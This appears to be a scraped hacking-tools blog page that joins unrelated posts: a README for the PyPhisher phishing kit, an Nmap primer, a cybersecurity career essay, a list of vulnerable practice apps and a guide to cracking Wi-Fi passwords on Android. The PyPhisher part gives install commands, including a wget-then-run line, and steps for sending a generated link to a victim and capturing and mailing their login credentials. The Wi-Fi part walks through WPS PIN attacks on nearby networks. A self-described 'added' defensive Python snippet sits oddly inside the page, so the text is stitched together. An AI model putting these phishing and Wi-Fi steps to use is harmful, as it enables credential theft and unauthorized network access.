"darpan.space" Latest Ethical Hacking And Penetration Testing Tools Use And How To Download On Kali, Mac, Android & Windows.

PyPhisher - Ultimate Hacking tool

Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

[*] Announcement

This project is now a part of MaxPhisher. Further bug fixes and feature additions will be available in that project.

[+] Installation

Install dependencies (git, python, php, ssh)
  • For Debian (Ubuntu, Kali-Linux, Parrot)
    • sudo apt install git python3 php openssh-client -y
  • For Arch (Manjaro)
    • sudo pacman -S git python3 php openssh --noconfirm
  • For Redhat (Fedora)
    • sudo dnf install git python3 php openssh -y
  • For Termux
    • pkg install git python3 php openssh -y
Clone this repository
  • git clone https://github.com/KasRoudra/PyPhisher
Enter the directory
  • cd PyPhisher
Install all modules
  • pip3 install -r files/requirements.txt
Run the tool
  • python3 pyphisher.py

Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

Pip

  • pip3 install pyphisher [For Termux]
  • sudo pip3 install pyphisher [For Linux]
  • pyphisher

Docker

  • sudo docker pull kasroudra/pyphisher
  • sudo docker run --rm -it kasroudra/pyphisher

Support

OS        Support Level
Linux     Excellent
Android   Excellent
iPhone    Alpha (Recommended docker)
MacOS     Alpha (Recommended docker)
Windows   Unsupported (Use docker/virtual-box/vmware)
BSD       Never tested

Options

usage: pyphisher.py [-h] [-p PORT] [-o OPTION] [-t TUNNELER]
                    [-r REGION] [-s SUBDOMAIN] [-u URL] [-m MODE]
                    [-e TROUBLESHOOT] [--nokey] [--noupdate]

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  PyPhisher's server port [Default : 8080]
  -o OPTION, --option OPTION
                        PyPhisher's template index [Default : null]
  -t TUNNELER, --tunneler TUNNELER
                        Tunneler to be chosen while url shortening
                        [Default : Cloudflared]
  -r REGION, --region REGION
                        Region for ngrok and loclx [Default: auto]
  -s SUBDOMAIN, --subdomain SUBDOMAIN
                        Subdomain for ngrok and loclx [Pro Account]
                        (Default: null)
  -u URL, --url URL     Redirection url after data capture [Default :
                        null]
  -m MODE, --mode MODE  Mode of PyPhisher [Default: normal]
  -e TROUBLESHOOT, --troubleshoot TROUBLESHOOT
                        Troubleshoot a tunneler [Default: null]
  --nokey               Use localtunnel without ssh key [Default:
                        False]
  --noupdate            Skip update checking [Default : False]

Features:

  • Multi platform (Supports most linux)
  • Easy to use
  • Possible error diagnoser
  • 77 Website templates
  • Concurrent 4 tunneling (Ngrok, Cloudflared, Loclx and LocalHostRun)
  • Up to 8 links for phishing
  • OTP Support
  • Argument support
  • Credentials mailing
  • Built-in masking of URL
  • Custom masking of URL
  • URL Shadowing
  • Redirection URL settings
  • Portable file (Can be run from any directory)
  • Get IP Address and many other details along with login credentials

Requirements

  • Python(3)
    • requests
    • bs4
    • rich
  • PHP
  • SSH
  • 900MB storage

If not found, php and python modules will be installed on first run

Tested on

  • Termux
  • Ubuntu
  • Kali-Linux
  • Arch
  • Fedora
  • Manjaro

Usage

  1. Run the script
  2. Choose a Website
  3. Wait some time for everything to be set up
  4. Send the generated link to victim
  5. Wait for victim login. As soon as he/she logs in, credentials will be captured

Video Tutorial

PyPhisher in Termux 
PyPhisher in Kali Linux by InfoSecPat 
PyPhisher in Kali Linux by Sathvik

What's new in 1.8?

  • Mailing
    • Now you can send credentials to any email. You just need a gmail and app password to use this feature. Edit the data in files/email.json
  • Custom Preview
    • Now you can set a custom social media preview of your link. Enter a website url when asked in shadow url. Your link will have the same appearance as that website in whatsapp/messenger/telegram etc. Note this only works with Cloudflared urls
  • OTP Support
    • 20 templates will show an option to enable otp pages
  • Saved
    • An option to view all saved credentials just from PyPhisher. These credentials won't get deleted in PyPhisher update

What's new in 1.9?

  • Loclx
    • Introducing a new port forwarding/tunneling service named localxpose or loclx. It is quite slow but still usable
  • Docker image
    • A docker image is published which can be pulled and run
  • PIP
    • This project is now also available in PIP

What's new in 2.0?

  • LocalHostRun
    • Introducing a new port forwarding/tunneling service named localhost.run. It works over ssh without binaries
  • Redirection url
    • Users can decide where the victim will be redirected after data is captured

Solution of common issues

  • Some secured browsers like Firefox can warn for '@' prefixed links. You should use pure links or custom link to avoid it.
  • VPN or proxy prevents tunneling and even proper internet access. Turn them off if you have issues.
  • Some android requires hotspot to start Ngrok or Cloudflared. If you face 'tunneling failed' in android, most probably your hotspot is turned off. Turn it on and keep it on until you close PyPhisher.
  • If you want mailing credentials then you need to use app password. Visit here and generate an app password, put that in files/email.json. You may need to enable 2FA before it.
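Seen from the defending side, the '@'-prefixed links and the tunneler hostnames mentioned above are properties a mail or chat filter can check. The following added example (not part of PyPhisher or of the original page) parses a link the way a browser does and reports the host that would really be contacted; the hostname suffixes, function names and sample links are assumptions constructed for the illustration.

```python
from urllib.parse import urlsplit

# Hostname suffixes for the tunnelers the page lists. These suffixes are
# assumptions drawn from the services' public endpoints, not from the page.
TUNNEL_SUFFIXES = {
    "trycloudflare.com": "Cloudflared",
    "ngrok.io": "Ngrok",
    "ngrok-free.app": "Ngrok",
    "loclx.io": "Loclx",
    "lhr.life": "LocalHostRun",
}


def analyze(url):
    """Return the host a browser would contact, the decoy text, and findings."""
    url = url.strip()
    if "://" not in url:
        url = "http://" + url  # links pasted into chats often lack a scheme
    parts = urlsplit(url)
    # Everything before the last '@' in the authority is userinfo, which the
    # browser does not use to pick the server.
    userinfo, at, _ = parts.netloc.rpartition("@")
    host = (parts.hostname or "").rstrip(".")
    findings = []
    if at:
        findings.append("userinfo")
        if "." in userinfo.split(":", 1)[0]:
            findings.append("userinfo-looks-like-domain")
    for suffix, tunneler in TUNNEL_SUFFIXES.items():
        if host == suffix or host.endswith("." + suffix):
            findings.append("tunnel:" + tunneler)
    return {"host": host, "decoy": userinfo if at else None, "findings": findings}


def triage(urls):
    """Keep only the links that produced at least one finding."""
    results = [(u, analyze(u)) for u in urls]
    return [(u, r["host"], r["findings"]) for u, r in results if r["findings"]]


# Constructed sample links; the tunnel and intranet hostnames are made up.
SAMPLE_LINKS = [
    "https://facebook.com@abc-def.trycloudflare.com/login",
    "https://github.com/KasRoudra/PyPhisher",
    "example.ngrok.io/signin",
    "https://user:pw@intranet.example/",
]

if __name__ == "__main__":
    for url, host, findings in triage(SAMPLE_LINKS):
        print(f"{url}\n  real host: {host}\n  findings : {', '.join(findings)}")
```

A link with plain credentials in the userinfo is reported with the single finding `userinfo`, so a filter can treat it less severely than a decoy domain in front of a tunnel host.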

[!] Disclaimer

This tool is developed for educational purposes. Here it demonstrates how phishing works. If anybody wants to gain unauthorized access to someone's social media, he/she may try out this at his/her own risk. You have your own responsibilities and you are liable for any damage or violation of laws by this tool. The author is not responsible for any misuse of PyPhisher!

This repository is open source to help others. So if you wish to copy, consider giving credit!

Credits:

Some base codes and templates are from htr-tech, otp templates are from ignitech and url masking is inspired from jaykali

Want to show support? Just spread the word and smash the star button


 

Nmap :- The Network Investigator

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators.

When it comes to hacking, knowledge is power. The more knowledge you have about a target system or network, the more options you have available. This makes it imperative that proper enumeration is carried out before any exploitation attempts are made.

Say we have been given an IP (or multiple IP addresses) to perform a security audit on. Before we do anything else, we need to get an idea of the “landscape” we are attacking. What this means is that we need to establish which services are running on the targets. For example, perhaps one of them is running a webserver, and another is acting as a Windows Active Directory Domain Controller. The first stage in establishing this “map” of the landscape is something called port scanning. When a computer runs a network service, it opens a networking construct called a “port” to receive the connection.  Ports are necessary for making multiple network requests or having multiple services available. For example, when you load several webpages at once in a web browser, the program must have some way of determining which tab is loading which web page. This is done by establishing connections to the remote webservers using different ports on your local machine. Equally, if you want a server to be able to run more than one service (for example, perhaps you want your webserver to run both HTTP and HTTPS versions of the site), then you need some way to direct the traffic to the appropriate service. Once again, ports are the solution to this. Network connections are made between two ports – an open port listening on the server and a randomly selected port on your own computer. For example, when you connect to a web page, your computer may open port 49534 to connect to the server’s port 443.

As in the previous example, the diagram shows what happens when you connect to numerous websites at the same time. Your computer opens up a different, high-numbered port (at random), which it uses for all its communications with the remote server.

Every computer has a total of 65535 available ports; however, many of these are registered as standard ports. For example, an HTTP web service can nearly always be found on port 80 of the server. An HTTPS web service can be found on port 443. Windows NETBIOS can be found on port 139 and SMB can be found on port 445. It is important to note, however, that especially in a CTF setting, it is not unheard of for even these standard ports to be altered, making it even more imperative that we perform appropriate enumeration on the target.

If we do not know which of these ports a server has open, then we do not have a hope of successfully attacking the target; thus, it is crucial that we begin any attack with a port scan. This can be accomplished in a variety of ways – usually using a tool called nmap, which is the focus of this room. Nmap can be used to perform many different kinds of port scan – the most common of these will be introduced in upcoming tasks; however, the basic theory is this: nmap will connect to each port of the target in turn. Depending on how the port responds, it can be determined as being open, closed, or filtered (usually by a firewall). Once we know which ports are open, we can then look at enumerating which services are running on each port – either manually, or more commonly using nmap.

So, why nmap? The short answer is that it's currently the industry standard for a reason: no other port scanning tool comes close to matching its functionality (although some newcomers are now matching it for speed). It is an extremely powerful tool – made even more powerful by its scripting engine which can be used to scan for vulnerabilities, and in some cases even perform the exploit directly! 

When port scanning with Nmap, there are three basic scan types. These are:

  • TCP Connect Scans (-sT)
  • SYN "Half-open" Scans (-sS)
  • UDP Scans (-sU)

Additionally there are several less common port scan types, some of which we will also cover (albeit in less detail). These are:

  • TCP Null Scans (-sN)
  • TCP FIN Scans (-sF)
  • TCP Xmas Scans (-sX)

Most of these (with the exception of UDP scans) are used for very similar purposes; however, the way that they work differs between each scan. This means that, whilst one of the first three scans is likely to be your go-to in most situations, it's worth bearing in mind that other scan types exist.

In terms of network scanning, we will also look briefly at ICMP (or "ping") scanning.

Cyber Security career

 

How To Succeed In Cyber Security Career?

Many IT professionals hesitate to venture into the arena of cybersecurity. Maybe, they feel that mastering the techniques is difficult. Maybe, they have not been able to master the requisite soft skills. Whatever the reason, the supply is not in alignment with the demand! True, this is quite a challenging field. However, if you make it your passion, it could fetch wonderfully lucrative returns!


Let us take a look at all the skills that will work for You.





Technical Skills:


Now, you do not really have to learn every single technical skill on earth! Just the basics will do for a newcomer like you. To illustrate, you may add some programming languages to your portfolio. They include assembly language, Java, scripting languages (Shell, PHP, Perl or Python), disassemblers and C/C++.


There are diverse operating systems on display. Do you comprehend their architecture and administration? Will you be able to manage them efficiently? Then again, you should be proficient in networking. As an IT professional, you cannot afford to remain ignorant of concepts related to the development of software. You must be acquainted with programming, as well as analytics, too.


It could be that you are already working in an establishment. You are gaining experience in the above-mentioned fields. Regardless, no one will hire you to manage cybersecurity unless you have a valid certificate to exhibit. They include certification in an ethical hacking course (CEH), Certified Information Systems Security Professional (CISSP), and Certified Information Security Advisor (CISA), etc. You will need to display a few years of work experience before any certification course agrees to grant you admission. Then again, you should obtain your certificates from reputed organizations.


Management Skills:


The certifications and practical experiences will turn you into a senior cybersecurity professional. Therefore, you should be able to manage all manner of assessments. They relate to web applications, network vulnerability, physical security, social engineering, wireless security, penetration testing, etc. All of them come under one umbrella, which is technical vulnerability. Your expertise in identifying and preventing breaches of security will make any organization happy!


Soft Skills:


This must surprise you! Why would someone employed as a cybersecurity professional require soft skills? You need them for a simple task: communication. Not everyone in your establishment is acquainted with IT terminology. Remember that you are not working alone. You are part of a team. Therefore, you will have to convey the most complicated of topics in the simplest of words.


They are not the only ones who will benefit. Your career will benefit too, via promotions! When the management understands your splendid presentation, it will feel in command of the situation. Similarly, customers will appreciate your kindness in explaining everything in plain language. It shows that you possess both verbal and written skills. At the same time, you are not someone who is in love with his/her own voice. You prefer to exhibit yourself as a patient listener. Therefore, customers will love to converse with you about problems in the virtual world!


Your greatest challenge will come from the arena of social engineering. Hackers use clever and convincing tricks to lure people into parting with their credentials, passwords, etc. You may put every kind of security measure in place. Yet, somebody always finds a way to destroy it. Therefore, you will have to be on your toes all the time. Your soft skills will permit you to identify and explain your concerns to non-technical individuals, wonderfully well.


Implementation Skills:


You have managed the theoretical aspects of cybersecurity magnificently. Now you must learn to put your knowledge to work too. Towards this end, observe the architecture of networks and systems keenly. It will help you to identify, as well as comprehend the usage of the existing security controls. At the same time, you will be able to recognize the weaknesses, if any, present in the deployment of applications, as well as in databases. Do bring your knowledge of coding and pre-built tools into play, if needed.


The above-mentioned are part of the professional side of cybersecurity. There is a personal side too, which only you can put into practice. One of them is developing good habits at work. To illustrate, you must learn to take note of every detail, whether it is significant or insignificant. Similarly, you must be methodical in whatever you do. This is evident when you go into in-depth explorations of technical issues with eagerness and enthusiasm. You are ready to adapt to any kind of situation. You display fantastic diagnostic and analytical skills, suggesting that you have up-to-date information about current web vulnerabilities. You have excellent knowledge of regulations relating to security and privacy too. In short, you are a walking encyclopedia!


No matter how much you study and practice, it may not prove enough in the 21st century. Hackers are always experimenting with novel ways to trouble business establishments. Therefore, it might help to set up a laboratory at home. You could use your own computer to set up multiple operating systems. Alternatively, you could use cloud technology to create an online lab. Do not worry about guidance. There are all manners of teachers available over the Net! Once you have set up the laboratory to satisfaction, use it to identify vulnerabilities. You can work out feasible resolutions too. The lab will help you to increase your practical abilities. In turn, you will be able to tackle virtual-life situations coolly and calmly.


Finally, never think that you know everything about cybersecurity. It is good to be confident, but not overconfident! Therefore, whenever there is a conference in your city, focusing on cybersecurity, attend it. Sometimes, a series of conferences are on the way. You can gain more via face-to-face meetings than you can from online conversations. Regardless, link up with professional communities online. Every individual has something of value to contribute. The more you learn, the better you will be in your job. Even social networking sites prove useful.



Web Application Hacking - List of vulnerable web applications

Web Hacking Practice Applications

  • List of vulnerable web applications and mobile applications (please scroll to the bottom of the page) to pwn and learn.
  • This will be updated on a periodic basis.

Vulnerable Web Applications




Damn Vulnerable Node Application (DVNA) - https://github.com/quantumfoam/DVNA/

Damn Vulnerable Web App (DVWA) - http://www.dvwa.co.uk/

Damn Vulnerable Web Services (DVWS) - http://dvws.professionallyevil.com/

Drunk Admin Web Hacking Challenge - https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/

Exploit KB Vulnerable Web App - http://exploit.co.il/projects/vuln-web-app/

Foundstone Hacme Bank - http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx

Foundstone Hacme Books - http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx

Foundstone Hacme Casino - http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx

Foundstone Hacme Shipping - http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx

Foundstone Hacme Travel - http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx

GameOver - http://sourceforge.net/projects/null-gameover/

hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl

OWASP Security Shepherd - https://www.owasp.org/index.php/OWASP_Security_Shepherd

PentesterLab - https://pentesterlab.com/

PHDays iBank CTF - http://blog.phdays.com/2012/05/once-again-about-remote-banking.html

SecuriBench - http://suif.stanford.edu/~livshits/securibench/

SentinelTestbed - https://github.com/dobin/SentinelTestbed

SocketToMe - http://digi.ninja/projects/sockettome.php

sqli-labs - https://github.com/Audi-1/sqli-labs

MCIR (Magical Code Injection Rainbow) - https://github.com/SpiderLabs/MCIR

sqlilabs - https://github.com/himadriganguly/sqlilabs

Hackazon - https://github.com/rapid7/hackazon

LAMPSecurity - http://sourceforge.net/projects/lampsecurity/

Moth - http://www.bonsai-sec.com/en/research/moth.php

NOWASP / Mutillidae 2 - http://sourceforge.net/projects/mutillidae/

OWASP BWA - http://code.google.com/p/owaspbwa/

OWASP Hackademic - http://hackademic1.teilar.gr/

How to Hack Wi-Fi password

 How to Hack Wi-Fi password in Android :-

If you want to enhance your knowledge and want to know the tricks and ways to hack the Wi-Fi password using Android device, then this article will help you. Lots of people are asking about how to hack Wi-Fi passwords using Android and whether it is possible or not. The straightforward answer is "yes" you can hack Wi-Fi passwords in Android devices using some tricks and tools (apps).

Before diving into our main topic about how to hack Wi-Fi passwords in Android phones, we first discuss some of the basic information about the type of Wi-Fi password security.

Types of Wi-Fi Password Security:-

There are primarily three different types of Wi-Fi password securities. These Wi-Fi securities are as follows:

  1. Wired Equivalent Privacy (WEP).
  2. Wi-Fi Protected Access (WPA).
  3. Wi-Fi Protected Setup (WPS).

Disclaimer Note: We do not support or encourage anyone to hack Wi-Fi passwords. Hacking is an illegal activity, and we won't be responsible if these tricks are used for hacking Wi-Fi. This article is only for knowledge's sake and educational purposes.

Method 1: Hacking Wi-Fi Password in Android using WIFI WPS WPA TESTER (without Rooting)

Wi-Fi WPS WPA TESTER is a popular Android app which is widely used for hacking Wi-Fi passwords. The Wi-Fi WPS TESTER app hacks only those routers that connect with WPS router with limited features. Hacking Wi-Fi using this app is easy and only requires following a few steps. The best part of this application is that you can use it without rooting your Android phone. You can also use this app on a rooted Android phone with some extra features.

Using this Android app, you can easily check the wireless security and strength of your router. If the router is not secure, then the WIFI WPS WPA TESTER app easily bypasses Wi-Fi password on your Android phone. After skipping the password, it connects the Android phone with the router without providing a password.

How to Hack Wi-Fi password in Android

The Wi-Fi WPS WPA TESTER hacking apps work on both rooted and non rooted Android phones. Below are the steps to hack Wi-Fi password on Android without rooting.

  1. Download and install the WIFI WPS WPA TESTER app from Play Store.
  2. Enable the Wi-Fi settings on your Android phone.
  3. Launch the app and search for the Wi-Fi networks nearby you.
  4. Select one of the networks from the result and start hacking by tapping it.
  5. You can input its key manually.
  6. The app checks the Wi-Fi security, and it tries different combinations of words and numbers to crack the Wi-Fi password. The app finds the network code in a short time and connects your phone automatically.

Method 2: Hacking Wi-Fi password in Android using WPSAPP

WPSAPP is an all-in-one app that allows you to connect to nearby Wi-Fi networks using an 8-digit PIN. The WPSAPP app makes it easier and more convenient to hack Wi-Fi passwords on both rooted and non-rooted Android phones. It applies several algorithms for generating random pins as well as some default pins. Using this app, you can hack any WEP Wi-Fi network without any difficulties.

When you scan for the networks, they appear with the red cross, question marks, and green tick marks. The red cross networks are secure, and their password is unknown. The networks showing with question marks have WPS protocol enabled, their pin is unknown, and the app allows testing them with a most common pin. Finally, the green ticks networks are WPS protocol enabled and their password known, and they can be connected.

How to Hack Wi-Fi password in Android

Below we have mentioned the steps to hack Wi-Fi passwords on Android using this app.

  1. Download and install the WPSAPP app on your Android phone.
  2. Now, open the app and search for nearby Wi-Fi networks.
  3. Click on the enabled WEP network you want to connect.
  4. Click on the "CONNECT WITH PIN" button, and after a few seconds, the app displays your network password.

Alert: This article is only for educational and knowledge purposes; it is illegal to misuse this information (don't misuse this information).
